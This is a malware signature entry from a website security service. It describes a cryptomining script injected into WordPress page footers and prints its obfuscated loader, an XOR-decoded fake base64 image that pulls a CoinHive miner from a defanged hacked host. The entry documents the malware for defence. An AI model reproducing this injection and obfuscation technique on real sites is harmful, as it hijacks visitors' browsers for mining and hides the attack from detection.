Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.cryptominer.1

Description: Website contains a script that among other things injects a CoinHive JavaScript miner into browsers of the site visitors.

The script is typically injected into the footer section of web pages. It hids from search enigne bots and changes frequently. The main decoded part looks like a fake base64-encoded image

<scr​ipt type="text/javascript"<
var aa9​5f71="data:​image/jpg;base64​,d8e4bc​b1aef8abaca1b4bde5faa8b7abb1acb1b7b6e2f8b9baabb7b4adac...skipped...aee6d2==";
for (var i=​24; i<aa95f71.length-​2; i+=2) 
document .​write(String​.fromCharCode(​parseInt(aa95f71[​i]+""+aa95f71[i+1]​,16)​^parseInt(aa95f71[​22]+""+aa95f71[​23],​16)));</script<
This script loads a CoinHive miner from a hacked third-party site hxxp://oneyoungcome[.]com/jqueryui.js. The script may also redirect certain visitors to ad sites or inject other malicious scripts.



Affecting: WordPress sites.

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb